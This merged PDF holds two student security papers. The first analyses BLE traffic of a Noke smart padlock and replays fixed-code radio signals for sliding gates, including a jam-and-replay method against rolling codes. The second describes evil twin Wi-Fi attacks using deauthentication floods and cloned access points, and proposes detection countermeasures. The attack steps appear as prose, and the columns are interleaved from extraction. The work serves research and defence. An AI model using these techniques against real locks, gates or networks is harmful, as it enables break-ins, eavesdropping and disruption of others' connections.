devices are by testing if a replay attack would allow adversaries to connections for Bluetooth 4.0:
compromise the security of the devices.
1. Just Works: In Just Works, the TK is always 0. This is
2. BLUETOOTH LOW ENERGY obviously an insecure method. There is no protection against
MITM attacks due to the lack of authentication between the
2.1 What is Bluetooth Low Energy? two devices. [3]
Bluetooth Low Energy (BLE), also known as Bluetooth Smart, is a
subset of classic Bluetooth and was introduced as part of the
2. Passkey: In Passkey, the TK is an identical 6-digit number
Bluetooth 4.0 core specification. It is characterised by its low power
between 0 and 999,999. The rest of the key is padded with

gp08
PDFsam_merge 57
61
zeroes. [3] The Passkey method is much more resilient to periodical data exchange of packets between two devices. It is
MITM attacks than Just Works. Initially, a device will therefore inherently private. [14]
generate a 6-digit PIN, and display it to the user. The user of
the other device then enters the same PIN number on that Connections involve two roles:
device to complete the authentication process. However, a  Central (Master): A device that repeatedly scans the
brute force attack can crack 6-digit number very quickly. In pre-set frequencies for connectable advertising packets
fact, there are some BLE encryption cracking software, such and, when suitable, initiate a connection. When a
as crackle, that can crack the TK easily. With the TK, crackle peripheral device accepts the request, a connection is
can derive all further keys during the encrypted session that built. The central device starts to message the timing
immediately follows pairing. [4] and initiates the periodical data exchanges.
 Peripheral (Slave): A device that sends connectable
3. Out of Band (OOB) pairing: In OOB pairing, the TK is advertising packets periodically and accepts incoming
exchanged via a different wireless technology such as NFC. connections request. [14] Once connected, the
As the most secure out of the three pairing methods, the BLE peripheral device follows the central device’s timing
connection can be assumed to be immune to passive and exchanges data regularly with it.
eavesdropping and MITM attacks if the OOB channel is
secure. [2] The biggest advantage of connections, as compared to
broadcasting, is the ability to organize data by using additional
2.3 BLE Communication protocol layers, and more specifically Generic Attribute Profiles
Bluetooth Low Energy allows nearby devices to communicate in
(GATT), to make each field or attribute more fine-grained
two different ways: Broadcasting and Connections. These two
controlled. [14] Generic Attribute Profiles (GATT) is a server-
mechanisms are subject to the Generic Attribute Profile (GAP)
client protocol. The main job of GATT server is to store
which decides how two BLE devices communicate with each
attributes, and make the attributes available when the client makes
other.
a request. A client can read and/or write attributes found in the
2.3.1 Broadcasting GATT server once it sends a request to the GATT server. [13]
Devices do not have to explicitly connect to each other to transfer
data. Using connectionless broadcasting, data can be sent out to 2.4 BLE in Home IoT Security
any scanning device or receiver in listening range. [14] As Increasingly, as smart homes become more popular, traditional
illustrated in Figure 1, broadcasting allows you to send out your deadbolts are slowly being replaced by smart locks which allow
data one-way to anyone that can receive the transmitted data. home users the convenience of unlocking their door with their
phones instead of the traditional key. With added convenience,
some of these locks allow the user to send the digital keys to anyone
or even unlock their door from anywhere in the world, as long as
there is connectivity. For close distance authentication of the home
owner, or authorized guests, these locks make use of Bluetooth
Low Energy to communicate.

2.5 Noke
Noke is a keyless smart padlock that can be unlocked by a smart
phone that has the Noke app installed. It connects to the user’s
smartphone through Bluetooth Low Energy, which uses a 128-bit
AES CCM Encryption securing all communication between Noke
and the smartphone, and has been claimed to use PKI technology
Figure 1. Broadcast topology and cryptographic key exchange protocol. On top of software
security, Noke has a boron hardened steel shackle with the latest
There are two roles in this mechanism: anti-shim technology to ensure mechanical hardware security. The
 Broadcaster: A device that broadcasts public Noke app also has other features such as allowing the owner to
advertising data packets to anyone who would like to share and revoke access to the lock and allowing the owner to know
receive them. [13] when, where and by whom the locks were accessed.
 Observer: A devices that listens to the data in the
advertising packets sent by the broadcaster. [13] 2.6 BLE Sniffing Hardware
In order to see what is going on to the naked human eye, we make
The advantage of Broadcasting is that it is fast and easy to use. It use of the Adafruit BLE sniffer and Wireshark to capture and
will be a good choice if only small amounts of data need to be analyse the Bluetooth Low Energy packets that are transmitted
pushed on a fixed schedule or to multiple devices. However, the from the smartphone to the Noke lock.
major problem of broadcasting is the lack of security and privacy.
Any device within the listening range is able to receive the data. 2.6.1 Adafruit BLE Sniffer
Therefore this mechanism is only suitable for the transmission of Adafruit BLE Sniffer is an adapter which is programmed with a
insensitive data. custom firmware from Nordic Semiconductors to be an easy-to-use
Bluetooth Low Energy Sniffer. It is able to passively capture BLE
packets and data exchanges between two Bluetooth Low Energy
2.3.2 Connections enabled devices, which in our case, would be the Noke padlock and
Devices have to explicitly connect to each other and handshake an Android phone running the Noke application.
with each other to transfer data. Connections allow devices to
transmit data in both directions. A connection is a permanent,

gp08
PDFsam_merge 58
62
The packets captured by the sniffer can be visualised using an open encrypted. This second packet was actually repeated when the
source packet analysis tool such as Wireshark with useful padlock was “re-unlocked” within the same app session. The value
descriptors so that every packet makes sense. There are a couple of only changed when the lock disconnected and reconnected with the
tools a user can use to start sniffing for BLE packets: application re-opened and the cycle restarted from Packet 1.
For Windows users: The official Nordic’s nRF Sniffer Utility
application which is a command line interface.
For Macintosh users: The open source application ble-sniffer-osx.
For Linux users: Adafruit provides a python binding software
which does the same thing.
Ultimately, all these software will be able to output the file to
a .pcap file which can then be used with Wireshark to remotely
analyse the packets captured.

2.7 Experiment
2.7.1 Preliminary Findings
Initially, it was tough latching onto the channel which Noke was
advertising on since one of its BLE characteristics was to hop
between 3 different channels during advertisement. Once we
managed to get the Adafruit sniffer to hook onto a channel, it
continued to monitor the connection between the master (Android
phone) and slave (Noke).
Following that, the third meaningful packet received was a
The first few packets after the connection request looked notification from the padlock back to the Android phone with a
unencrypted as there were no Control Opcode: handle of 0x000b.
LL_START_ENC_REQ packets. It made sense that there was no
encryption on the Bluetooth link layer as there was no pairing
request during the first set-up. Subsequent packets were not
encrypted on the link layer. Hence, we further analysed the packets
after the connection request.

2.7.2 Wireshark Analysis


We ran a few tests collecting samples of Noke’s communication
with the Android phone and observed how the communication was
made. The analysis below was based on our NOKE(YS7).pcap
capture. [12] The first meaningful packet always consisted of a The forth packet contained a “Write Command” with the handle
simple “Write Request” command with a handle of 0x000c. 0x000e. We assumed that this was the actual “Unlock’ command as
the following packet contained the same payload as Packet 2 above
which hinted to us that it was the re-unlock step we took within the
same minute.

The second packet consisted of a “Write Command” operation with


a handle of 0x000e and a payload which we assumed was

gp08
PDFsam_merge 59
63
We then tried to decrypt the packet which we’ve discovered during
our sniffing attempts and then came back with the following results.
The packet header / type seemed to be similar and not changed
From the analysis, it seemed as though there was some handshake
when compared to the other researcher findings. The thing which
happening within Packets 2 and 3 and the 4th packet was making
is different now is that the payload formatting seems to be different,
use of the handshake secret to send over the unlock padlock
hence we infer that there might be some logic change within the
command. Since the values did not change when we tried to unlock
code base.
the padlock a few times, we suspected that there was probably some
mechanism within the application layer that was doing the
encryption, decryption and setting up the unlock session.
Therefore, replaying the value did not do much to the lock
unfortunately.

2.8 3rd Party Researcher Findings


While we were trying to reverse engineer those values, we managed
to found another security researcher online who was also
researching on the same Bluetooth padlock and found a flaw in it.
[11] The researcher was able to decompile the .apk file of Noke and
found that the developer hardcoded the AES key which encrypts
the communication between the padlock and the application.
Hence, there was an application layer encryption being done onto
each packet going back and forth the lock and the app. Furthermore,
packet 2 and 3 which we also discovered during our sniffing
attempts was random numbers being exchanged between the two
devices. Those random number packets were also encrypted with 2.9 Analysis of Noke BLE Communication
the hardcoded AES key. Through our packet analysis of the communication between the
Noke Android App and the Noke padlock, we came up with the
With reference to Morphus Labs findings, we tried to recreate what finding that after the app notifies the lock that it wants to write, the
he discovered based on the latest Noke APK which was v2.0.2. app will first generate some kind of one-time value and then send
After decompiling the application, we’ve found that most part of over the value to the lock. The lock then notifies and sends back
the application have been obfuscated but unfortunately the another value to the app. From then onwards, the “Unlock”
hardcoded AES key can still be found within the obfuscated code. command is sent over to the padlock. All the communication is
encrypted between both devices. The encrypted as of now is broken
since the hardcoded key still exists within their latest code base.
Given more time, we’ll be able to run a static analysis tool against
the apk to monitor its behaviour and perhaps try to figure out what
is going on backend which crafts the packet payload. As of now the
decrypted payload will remain to be some gibberish value.

3. Radio Frequency
Radio frequency is any of the electromagnetic wave frequencies
that lie in the range extending from around 3kHz to 300 GHz. From
planes in the skies, to just the FM radio that transmit radio stations
broadcast to your automobile, radio frequency is used in almost
everywhere. Given its capability of transmitting long distance,
radio frequency is a cheap and effective way to transmit data and
for devices to communicate.

gp08
PDFsam_merge 60
64
3.1 Security in Radio Spectrum 3.3 Replay Attack
However, radio frequency is lacking in security. With the right
tools, that do not cost a lot, anyone is able to download the relevant 3.3.1 Sniffing and Decoding the signal
programs such as GQRX or SDR# and start listening on these Since we had the actual hardware remote on hand, we did not need
invisible signals. to sit around and listen to the whole range of frequency before
identifying the frequency band of which the remote is
Some home devices use these signals to communicate with each communicating on. Opening up the outer plastic case of the remote,
other, such as a wireless doorbell while some other devices use we found out that the remote is communicating on a 330MHz
these signals to authenticate the owner for their entry, like a sliding frequency band. Confirming with the SDR, we set the frequency to
gate in most private homes. In this project, we will be studying the 330MHz and indeed we get a signal when the remote was pressed
latter case; that is, the radio frequency used in the operation of as shown in the diagram below
sliding gates in homes.

3.2 Terminology
First of all, modulation: it is a process of varying one or more
properties of a periodic waveform, also known as a carrier signal,
with a modulating signal that typically contains information to be
transmitted. These are some different modulations [9]:
1. Amplitude modulation (AM): The height (or the amplitude)
of the signal carrier is varied to represent the data.
2. Frequency modulation (FM): Contrasting with AM, the
amplitude does not change and the varying instantaneous
frequency of the carrier waveform reflects the data. For
example, a higher frequency of the waveform represents a
binary one, while a lower frequency represents a binary zero.
3. Phase modulation (PM): Similar but not the same as FM,
phase modulation varies the frequency of the carrier waveform
to reflect changes in the frequency of the data.
4. Polarization modulation: Angle of rotation of an optical
carrier signal is varied to reflect transmitted data.
5. Pulse-code modulation: Method to convert analogue signals We were able to view the waveform using audio editing software
to digital ones so that the digital signals can be transmitted such as Audacity to decode the signal manually. As we compared
through digital communication. the waveform file, we found that the signal was repetitive and
6. Pulse-width modulation: A modulation technique used to identical. This meant that the sliding gate was making use of a fixed
encode a message into a pulsing signal. code remote control, that is, the code sent out was always the same,
which was susceptible to replay attacks.
Secondly, given a large range of frequency that the device can take,
it is important to know which frequency the device is Apart from decoding manually, we got to know of a tool, rtl_433
communicating on. A frequency band is an interval in the that allows us to use the SDR to tune into the frequency we wanted
frequency domain, delimited by a lower frequency and an upper and listen in on to that signal while the program helps us to decode
frequency. In Singapore, the Info-Communications Media the signal. Using rtl_433 (with the -f flag and -A flag), we managed
Development Authority is in charge and takes care of the frequency to decode the signal received by the SDR. The image below shows
allocation and assignment. [8] the screenshot of the signal captured using the SDR and then passed
through the rtl_433 program.
There are two main types of ways radio frequency is transmitted in
a remote control: fixed code or rolling code. Both fixed code and
rolling code share this in common, that is, they send out a code, and
if code is the same as the one expected from the receiver, the
receiver actuates the relay and operates the hardware, be it a lock
or a gate motor. However, the main difference is this: remote
controls with a fixed code will always send out the same signal
code, while ones with rolling code will send out a unique code
every time, in an attempt to prevent replay attacks.

Lastly, a Software Defined Radio (SDR) is a radio communication


device where one can tune the radio frequency to listen to through
software. It is a cheap alternative for anyone who wants to listen in
on these invisible radio signals and we will be using one in this
project.

gp08
PDFsam_merge 61
65
As you can see, the signals that were being received by the SDR The following shows the connection diagram of the add-on and our
were always the same, exposing the underlying fixed code implementation based on socket programming:
mechanism implemented in the gate system. If we were to study the
waveform of the .wav file that was being recorded in GQRX, we
would be able to spot repetitive patterns of the waveform.

3.3.2 Transmitting the Signal


Using GQRX, we recorded a wav file of the unlock signal. We
found a program that allowed us to transmit radio waves through
the GPIO pin of the Raspberry Pi, called rpitx. After installing the
rpitx on the Raspberry Pi, we proceeded to re-emit the recorded
wav file.

Apart from using GQRX, rtl_sdr, rtl_fm or similar programs, we


were also able to record the signal through Raspberry Pi commands
with an SDR connected to the Raspberry Pi USB port.

3.4 Rolling code vs. Fixed Code


In Singapore, sliding gates predominantly use the fixed code
mechanism. This is due to the cost of replacing the remote control.
The embedded hardware from the gate motor manufacturer (the
more advanced ones) has their own rolling code system, however,
due to the cost of getting the remotes replaced, vendors add on
another receiver to communicate with a 3rd party remote control,
and those controls are using fixed code, thus impairing the security
measures against replay attacks.

Although the rolling code mechanism would make it harder for


adversaries to get past the sliding gate, it does have its own
vulnerabilities. Given that every signal sent out is different from the
previous signal, there are ways around the system that exploit this
as well. The scenario below demonstrates one way that the
adversary can bypass the security in the rolling code mechanism:

The adversary can jam the signal around the receiver with radio
noise so that the first signal is unable to unlock the sliding gate.
When the user is unable to unlock the sliding gate on the first press,
the user would press the remote again. As the jamming device is
programmed to record and jam that second signal, while replaying
the first signal, the gate will be unlocked. At any point in time,
when the device detected a new signal, it jams that signal and replay 5. ACKNOWLEDGMENTS
the previous signal to unlock the gate. The adversary would be able We would like to extend our gratification to Prof Hugh Anderson
to retrieve the jamming device with a stored rolling code to conduct for his continuous guidance and support throughout this project. He
a replay attack at any time he chooses. has been very helpful in loaning us the equipment needed for this
project.
4. ADD ON PROTOTYPE FOR GATE
As mentioned earlier, the current implementation of the sliding gate 6. REFERENCES
security is not sufficient, be it fixed code or rolling code [1] Encryption Key Generation and Distribution. (2017).
implementation. As the remote simply provides the signal for the Teledyne Lecroy Everywhereyoulook. Retrieved 10
receiver to match and actuate the relay, any device capable of November 2017, from
receiving any signal and analysing them for matches would be able https://www.fte.com/webhelp/sodera/Content/Documentation
to toggle the switch to high or low in software, rotating the gear in /WhitePapers/BTLE/EncryptionKeyGenerationAndDistributi
the process. Thus, we propose an idea of providing an add on for on.htm
the existing sliding gate security that is an improvement on the [2] Bon, M. (2017). A Basic Introduction to BLE Security –
existing system but does not cost much to change. Wireless – eewiki. Eewiki.net. Retrieved 10 November 2017,
from
Going away from radio frequency, we looked into Raspberry Pi, a https://eewiki.net/display/Wireless/A+Basic+Introduction+to
computing device that can be programmed to do almost anything. +BLE+Security#ABasicIntroductiontoBLESecurity-
Furthermore, as the Raspberry Pi is a programmable device, further SecurityIssuesFacingBLE
advancement can be made to allow it to communicate and automate [3] Balmus, A. (2017). Bluetooth Low Energy SMP Pairing |
the sliding gate, possible ideas of which will be discussed in the NXP Community. Community.nxp.com. Retrieved 10
appendix. November 2017, from
https://community.nxp.com/thread/332191

gp08
PDFsam_merge 62
66
[4] Crackle, crack Bluetooth Smart (BLE) encryption. (2017) 2017, from
Lacklustre.net. Retrieved 10 November 2017, from http://searchnetworking.techtarget.com/definition/modulation
https://lacklustre.net/projects/crackle/ [10] Tutorial: Replay Attack with an RTL-SDR, Raspberry Pi and
[5] Townsend, K. (n.d.). Introduction to Bluetooth Low Energy: RPiTX. (2017). Rtl-sdr.com. Retrieved 10 November 2017,
GATT. Retrieved 10 November 2017, from from
https://learn.adafruit.com/introduction-to-bluetooth-low- http://www.rtl-sdr.com/tutorial-replay-attacks-with-an-rtl-
energy/gatt sdr-raspberry-pi-and-rpitx/
[6] Milovanovic, V. (2017) Bluetooth Low Energy – Part 1: [11] Pasknel, V. (2017). Hacking the Nokē Padlock – Morphus
Introduction to BLE – MikroElektronika Learn. Labs. Morphus Labs. Retrieved 19 November 2017, from
MikroElektronika Learn. Retrieved 10 November 2017, from https://morphuslabs.com/hacking-the-nok%C4%93-padlock-
https://learn.mikroe.com/bluetooth-low-energy-part-1- adfe7b1b5617
introduction-ble/ [12] Mustaqiim, M. (2017). Noke Packet Capture.
[7] 1, L. (2017). What’s The Difference Between Bluetooth Low https://github.com/YongSiang94/GateSecurity/blob/master/N
Energy And ANT? Electronic Design. Retrieved 10 oke/Noke%20Packet%20Capture/NOKE(YS7).pcap
November 2017, from [13] Punch Through. (2017). Punchthrough.com. Retrieved 19
https://www.electronicdesign.com/mobile/what-s-difference- November 2017, from
between-bluetooth-low-energy-and-ant https://punchthrough.com/bean/docs/guides/everything-
[8] Infocomm Media Development Authority (3 November else/how-gap-and-gatt-work/
2017). Frequency Allocation & Assignment. Retrieved 10 [14] Getting Started with Bluetooth Low Energy. (2017). O’Reilly
November 2017, from | Safari. Retrieved 19 November 2017, from
https://www.imda.gov.sg/regulations-licensing-and- https://www.safaribooksonline.com/library/view/getting-
consultations/frameworks-and-policies/spectrum- started-with/9781491900550/ch01.html
management-and-coordination/frequency-allocation-and-
assignment
[9] Rouse, M. (2017). What is modulation? –Definition from
WhatIs.com. SearchNetworking. Retrieved 10 November

gp08
PDFsam_merge 63
67
PDFsam_merge 68
Exploration of the evil twin attack on Wi-Fi access points
and countermeasure

Melvin Soh Rajendran Tiago Valérian Yoshiaki


Premkumar Kieliger Rey Nishimura
National University National University National University National University National University
of Singapore of Singapore of Singapore of Singapore of Singapore
e0002846@u.nus.e a0126219@u.nus.e tiago.kieliger@gma e0216407@u.nus.e yoshiaki.n@u.nus.e
du du il.com du du

ABSTRACT not discussed here. We have worked both on unprotected


This project addresses security flaws in the design of AP (open Wi-Fi connection that does not require a
IEEE.802.11 (more commonly known as the Wi-Fi password and that is not encrypted), evidently easier, and
protocol) that allows an attacker to clone an existing Wi-Fi Protected Access 2 (WPA2), today’s most common
access point and direct the traffic to that malicious clone Wi-Fi security protocol. Other security protocols, such as
with the goal of acquiring a man in the middle position. In Wireless Equivalent Privacy (WEP) or the first version of
this paper, we will explore how an attacker might create a WPA are not used anymore today because of the security
clone of an Access Point, how he disconnects existing flaws that they contained, and are thus not discussed here.
users from that network and how the users will connect to This man-in-the-middle position is a necessary starting
the “Evil Twin”. We will also explore various point for several different attacks that one can try to
countermeasures against these techniques and also achieve. For that reason, making sure a network is not
propose our own solutions. being spoofed is an important step towards making the
Wi-Fi setup secure for its users. That is why we also
Categories and Subject Descriptors explore various ways of protecting against this “Evil
C.2.0 [Computer-Communication Networks]: Twin” attack. We will describe this attack in detail later
General---Security and Protection; on.
C.2.2 [Computer-Communication Networks]: Throughout this report, we will be referring to the term
Network Protocols---Protocol Verification, Wi-Fi “open Wi-Fi”. We are going to define its meaning as
Protocols; follows:

1. Wi-Fi network with no encryption scheme, or


General Terms 2. Protected Wi-Fi network with its key made
Experimentation, Security available to the public.
The second definition is realistic in some settings: for
Keywords example, a fast-food store may have a WPA2-protected
Wi-Fi, Deauthentication, WPA, Evil twin, hotspot, network whose key will be provided upon the purchase of
access point, spoofing, man-in-the-middle, WPA2 the store’s food or service.

1. INTRODUCTION 2. MAN-IN-THE-MIDDLE
In any place in the city, when we scan for available Wi-Fi A man-in-the-middle (MiTM) is a type of attack where a
networks on our devices we get a long list of networks, malicious user M monitors the communication between
some are protected, while others are not. Most of us would two users A and B. Both A and B think they are directly
have the experience of trying to connect to any of the open connected to each other, while in fact M is receiving all
networks hoping for free internet connection. For example the messages from A to B and from B to A, and redirects
in Singapore there are more than 3500 unsecured access it to B or to A. If this communication is not encrypted, the
points provided by the government [3]. At home, we are malicious user has access to all the private data
used to connect to our own protected Wi-Fi from our transmitted, and has a possibility of sending evil messages
mobile devices. But how do we ever know that the instead of just redirecting the conversation.
networks we connect to are what they claim to be ? In this
project, we attempt to explore various techniques to 2.1 MiTM on Open AP
actively gain a man-in-the-middle position between a Wi-
Fi AP (we will extensively use the term AP in this report
as a shorthand for access point) and its users after the
connection between them is already established (whether
protected or not). Hoping that a user connect to an evil AP
by himself is more related to social engineering and is thus

gp09
PDFsam_merge 65
69
allows the attacker to exploit a vulnerability in the WPA2
4-way handshake.

3. VULNERABILITIES AND
EXPLOITS
In this section we will describe various vulnerabilities of
Figure 1. MiTM on Open AP
wireless devices and the protocol they currently use and
In the case of an open Wi-Fi (unprotected or WPA2 then combine those in order to perform a MiTM attack.
encrypted with known key), A client (a mobile phone or a
laptop say) is connected to the legitimate AP, which is the 3.1 Frames
gateway router and thus provides a connection to the rest
The Wi-Fi protocol defines various types of frames used
of the network (i.e. to the internet). In this setup we will
by the clients and the access points to communicate. A few
consider a MiTM in the form of a rogue AP which will
examples are the data frame, which encapsulates data
trick client A into thinking that it is the legitimate AP
from higher layers, the beacon frame, which is emitted
using a deauthentication attack that will be thoroughly
periodically by an AP to advertise its presence, or the
described later on. Of course the rogue AP can then itself
deauthentication frame which terminates the
connect to the internet by any means, such as a broadband
communication between a client and an AP. The latter is
cellular network, another access point, or even through the
of particular interest since a weakness in its conception
legitimate AP itself.
opens the door to the so-called deauthentication attack.
This situation is depicted in the above diagram, where the We leverage this flaw in our project in order to get a
red arrows show the connections after the rogue AP has MiTM position.
acquired a MiTM position.
3.2 Deauthentication Attack
Since in this communication we either know the WPA2
key, or there is no encryption at all, the rogue AP can The deauthentication frame is sent by a station to another
reliably read, block, modify or inject packets, which opens when it wants to terminate the communication between
the door to a whole range of attacks. As an example in our the two, and can be sent at any point in time while the two
demonstration we use the MiTM position to redirect all stations are connected. The major flaw resides in the fact
the web traffic from the client to a crafted HTTP server. that this deauthentication frame is not itself
cryptographically authenticated in any way even when the
2.2 MiTM on WPA2 secured AP connection is WPA2 secured. This deauthentication frame
can even be broadcasted in order to terminate all the
ongoing connection with a particular AP. As such an
attacker can impersonate an AP and broadcast
deauthentication frames to all the users connected to it and
thus terminate all the ongoing connections within the
targeted network. Figure 3 illustrates this process:

Figure 2. MiTM on WPA2 secured AP

The MiTM attack on a WPA2 secured AP is slightly


different from that on open AP since we assume that the
connection between the client and the AP is encrypted. In
this case if a rogue AP M manages to trick client A into
communicating with it, it cannot directly act as an access
point since the packets received are encrypted. However,
the attacker M can transmit the packets received from A
to the legitimate AP S and also transmit packets received
from S to A. Figure 2. depicts this setup.

In this situation A and S are not aware that all their


communications are going through M. This allows M to
reliably block or replay packets. This raises security
concerns : the recently discovered attack that defeats
WPA2 provides a perfect example : the key reinstallation
attack needs this MiTM position to reliably control the
packets sent between the client and the AP. [6] In
particular, being able to reliably block specific packets Figure 3. Deauthentication attack

gp09
PDFsam_merge 66
70
Depending on its configuration, the client’s firmware may be arbitrary, but must be identical to that of the legitimate
try to resume the connection promptly after receiving the AP. In fact, this is necessary because the session key used
deauthentication frame from the AP. Sending many by the client and legitimate AP to communicate depends
spoofed deauthentication packets in short time intervals on the key, the client’s and the AP’s MAC addresses [5].
prevents the client to access the server at all. This denial The deauthentication attack works just as well as for the
of service attack (DoS) is very effective against any access open Wi-Fi case since the deauthentication frame is not
point or client that is IEEE 802.11 compliant. authenticated as discussed in section 3.2.

3.3 ESSID, BSSID and Channels 4. IMPLEMENTATION ON OPEN Wi-


In this section we will delve into different properties of Fi
AP’s which will be relevant when it comes to the evil twin In this section, we will discuss the implementation of our
attack. A basic property that everyone knows about, tough demonstration for the evil twin attack on open Wi-Fi. We
maybe under a different name, is the ESSID. In fact, the will cover the material used as well as the code we
ESSID, which stands for extended service set developed for this purpose.
identification, is nothing but the name of the access point.
This name is not unique and can be shared by many 4.1 Tools
distinct AP’s. Then there is the BSSID, which stands for In the next sections we will describe in details the setup
basic service set identification, that is the MAC address of we used and the software we developed in order to achieve
the AP. This 48-bit identifier is supposed to be unique but a successful evil twin attack on an open AP and on a
there is no verification whatsoever and it can thus be WPA2 secured AP.
spoofed. Finally an AP has to transmit on a given channel,
where each channel corresponds to a range of radio 4.1.1 Hardware
frequencies. Some countries have different regulations
The setup needed for this demonstration consists of 3
concerning different channels but the details of it are not
distinct entities, which are the client, the AP and the
relevant to the discussion. For example channel 10 is
attacker. For the client we experimented with different
centred at 2.457 GHz with a width of 22 MHz. Usually
devices such as an android phone, an iOS phone, a linux
AP’s tend to use different channels so as not to interfere
laptop et and windows laptop. In each case the attack
with each other, tough it is possible to have multiples
worked. For the legitimate AP we used a TP-LINK M7350
AP’s, even with the same ESSID, on the same channel as
mobile Wi-Fi, but any commercial access point can be
long as their BSSID are different.
used. The most important part is the hardware used by the
attacker: we used a laptop running on linux with an
3.4 Evil Twin Attack on Open Wi-Fi integrated wireless chip, combined with 2 usb Wi-Fi-
When connected to a particular AP, a device will dongles. The attacker runs a software AP on his machine.
remember its ESSID to reconnect to it later on. Although This requires two distinct network interfaces, one called
it depends on the device and may be disabled in some the facing interface which connects the laptop to the
cases. But most people are used to their computer internet, while the other acts as the rogue access point.
automatically connecting to known AP’s, so we assume Moreover an additional network interface is needed to
that this feature is enabled. If multiple AP’s with the same perform the deauthentication attack. This interface needs
known ESSID are available, the devices chooses the one to be compatible with the aircrack-ng software [2], which
with the stronger signal. This behaviour, combined with we will describe in the next section. For this we used a TP-
the deauthentication attack can be leveraged to perform LINK WN722N usb dongle.
the so called “evil twin attack”. The setup is as follows :
suppose a client is connected to an unprotected AP with 4.1.2 Software
ESSID “free_wifi”. An attacker can set up a rogue AP (the
As for the software, we have used many different Linux
evil twin) with the same essid (i.e. “free_wifi”) as the
tools, accessible through command line. The most
target on a different channel (the BSSID can be arbitrary).
important ones are ifconfig and iwconfig. These two tools
Even if the signal of this rogue AP is stronger than the
provide information about the interfaces, and allow to
legitimate one, this will not make the client connect to it.
change their configuration. Iwconfig is more focused on
In order to achieve that the attacker performs a
wireless interfaces, and allows for example to set an
deauthentication attack, which will disconnect the client.
interface to monitor mode, while ifconfig is used for more
Upon reconnection, the client will connect to the rogue AP
general purposes, such as activating or deactivating an
given that its signal is stronger (which is a strong
interface. We used another tool named iwlist that allows
assumption). At this point the attacker successfully
to obtain information on the networks detected by a
acquired a MiTM position.
wireless interface.
3.5 Evil Twin Attack on WPA2 Secured We also used the aircrack-ng module [1] that contains
Wi-Fi many different “hacking” tools. However we only used
As we have seen it in section 2.2, a MiTM on a WPA2 one of them, aireplay-ng which allows to send frames
secured Wi-Fi does not try to decrypt the packets but only (that comes handy for the deauthentication part). Finally
forward them between the client and the AP. To achieve we used create_ap, a tool [4] that allows the creation of
this, we proceed as for the open Wi-Fi case, with the an access point specifying the desired ESSID, the Internet
difference that the MAC address of the rogue AP cannot access interface, and the outgoing interface.

gp09
PDFsam_merge 67
71
4.2 Methodology no difference between them, they all got disconnected as
The program evil_twin.sh that we have written is a Bash intended when broadcasting deauthentication frames.
script that performs the evil twin attack on open Wi-Fi. However, some devices do not accept broadcasted
The code is provided in Appendix I. Below is the deauthentication frames. This problem was remedied by
explanation of the main ideas of this implementation. sending a targeted deauthentication frame to that device.
The reconnection also automatically started on all of these
First of all, we ask the user which interface he wants to devices. Most of the times, it reconnected to the evil twin.
use for the connection to the Internet, for the access point, However, sometimes, especially when the legit AP was
and for the deauthentication. This is a necessary step for closer than the rogue AP, the device was reconnecting to
portability, because the Wi-Fi card’s interface name can the legitimate one which is not our goal.
change from a computer to another, and is very likely to
change from a Wi-Fi dongle to another. The results for the WPA/WPA2-PSK network is the same
as the open Wi-Fi network. The important thing to note
Then the script shows a list of the existing nearby APs, regarding the protected networks is that even when they
and asks the user to select one to perform the attack on. are deauthenticated from the target network and
The next step is to scan the network, and keep only automatically connect to the Evil Twin AP, the users are
information (ESSID, BSSID, channel) about the not prompted to re-enter the password. This will prevent
previously selected AP. even knowledgeable individuals from getting suspicious.

After this, we can create the rogue AP. We do this using 5. PROPOSED COUNTERMEASURES
create_ap and specifying the access point interface, the There are various ways to prevent the evil twin attack from
Internet access interface, and the ESSID of the Wi-Fi, that happening whether on the client side or on the access point
will of course be the target Wi-Fi’s name. side. In this section we will discuss some of them and
evaluate their efficacy.
Now that we have created the evil twin, we need the users
to connect to it. That is, we need to disconnect them from
the legitimate AP and hope our rogue AP has a stronger
signal so that they automatically reconnect to ours.
Placing our computer physically closer to the users than
the legitimate AP can contribute to the success of the
operation. Figure 4. Notification of ongoing attack
For this part we first need to set the deauthentication
interface in monitor mode. Then in a loop, a
5.1 Detection of Deauthentication
deauthentication attack is launched against every AP with Similar to spoofing a deauthentication frame, it is also
the target ESSID (in case the target Wi-Fi is actually easy for us to sniff what kind frames are sent over the air,
provided that they are not encrypted from our perspective:
composed of various different APs), broadcasting
thus, we are able to monitor the rate at which
deauthentication frames with aireplay-ng. At this point all
deauthentication frames are sent to or from the AP’s MAC
of the users of the target AP should be disconnected, and
are likely to automatically reconnect to the evil twin. address. If this rate is unusually high, there is a high
chance that a deauthentication attack is taking place.
The implementation of an Evil Twin access point for Furthermore, The deauthentication frames are almost
WPA/WPA2 networks with a known Pre-Shared-Key is always broadcasted and the Reason Code for
similar to that of open Wi-Fi. WPA/WPA2-PSK networks deauthentication is always the same; “Class 3 frame
are predominant in most restaurants and coffee shops received from nonassociated STA (0x0007). When we
where the Pre-Shared-Key is displayed in public. Most combine these three conditions, it is possible to detect
members of the public believe that as long as there’s a deauthentication attacks with a high probability.
password for the Wi-Fi network, that it is secured,
however, the following steps will show how easy it is to 5.2 Detection of Evil Twin
set up a Man-In-The-Middle attack for these networks. As we have discussed in previous sections the evil twin is
a rogue access point that possesses the same ESSID as a
First, a rogue AP will be created just as the previous legitimate one and may or may not have the same BSSID
section states, except that this time, we will change the as well.
network type to WPA/WPA2-PSK and assign the same
Pre-Shared-Key as that of the target network. Following In the case of a cloned BSSID, a way to detect the attack
which, deauthentication frames will be broadcasted to the is to scan the neighbouring access points regularly and
target network to bump off all existing users from that notify the user when two AP’s have the same ESSID and
network. Finally, the victims will automatically connect to BSSID but on different channels. This usually does not
the Evil Twin Access Point and the Man-In-The-Middle happen unless an attack is ongoing.
position is gained by the attacker.
If the rogue AP has an arbitrary BSSID different from the
4.3 Results legitimate one, the details of the AP’s alone do not give
We tested this script using different devices as the user, enough information to detect an ongoing attack. As such
running on either iOS, Android or Windows 7. There was a user could create a whitelist containing all the ESSIDs

gp09
PDFsam_merge 68
72
he trusts and their corresponding BSSIDs. For example The algorithm of detect_deauth.py is very simple and is
the home setup of a user could be composed of multiple as follows:
APs in order to have a good cover inside his whole house.
When setting up those APs, the user whitelists their 1. Set the Wi-Fi dongle to monitor mode. This
corresponding BSSIDs. Then a program scans the access allows us to use the interface to sniff packets
points regularly a informs the user when an available AP being sent in the air.
is not whitelisted (figure 5). 2. Specify which MAC address to monitor.
3. For every deauthentication frame sniffed by the
Combining these two approaches at the same time allow interface, check its source and destination MAC
for an easy to implement client-side detection of the evil address. If either of the two fields contains the
twin attack. The main drawback being the difficulty of target MAC address, we increment the deauth
maintaining a correct and up-to-date whitelist of the counter.
trusted AP’s. 4. If the rate of deauthentication frames per minute
